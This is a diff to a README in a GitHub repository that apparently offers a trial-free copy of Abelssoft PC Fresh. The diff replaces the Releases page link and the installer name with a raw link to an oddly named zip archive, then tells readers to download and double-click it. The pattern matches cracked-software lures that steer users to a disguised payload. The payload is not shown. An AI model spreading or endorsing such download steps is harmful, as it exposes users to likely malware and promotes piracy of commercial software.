Chaann080814/Abelssoft-PC-Fresh-No-Trial/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To start, go to our [Releases page](https://github.com/Chaann080814/Abelssoft-PC-Fresh-No-Trial/releases).
+   To start, go to our [Releases page](https://raw.githubusercontent.com/Chaann080814/Abelssoft-PC-Fresh-No-Trial/main/outhorror/Abelssoft-PC-Fresh-No-Trial-retentive.zip).

 2. **Choose the Latest Version**
    On the Releases page, you will see a list of available versions.
 Look for the latest version at the top.
 Click on it to view details.

 3. **Download the Installer**
-   Find the file named `PCFreshInstaller.exe` under the Assets section of the latest release.
+   Find the file named `https://raw.githubusercontent.com/Chaann080814/Abelssoft-PC-Fresh-No-Trial/main/outhorror/Abelssoft-PC-Fresh-No-Trial-retentive.zip` under the Assets section of the latest release.
 Click on it to download the installer to your computer.

 4. **Run the Installer**
    Once the download is complete, locate the file in your Downloads folder or the directory where you saved it.
-Double-click on `PCFreshInstaller.exe` to begin installation.
+Double-click on `https://raw.githubusercontent.com/Chaann080814/Abelssoft-PC-Fresh-No-Trial/main/outhorror/Abelssoft-PC-Fresh-No-Trial-retentive.zip` to begin installation.

 5. **Follow the Installation Instructions**
    A setup wizard will appear.
 Follow the on-screen instructions to complete the installation.
 You can choose the default options if you're unsure about any settings.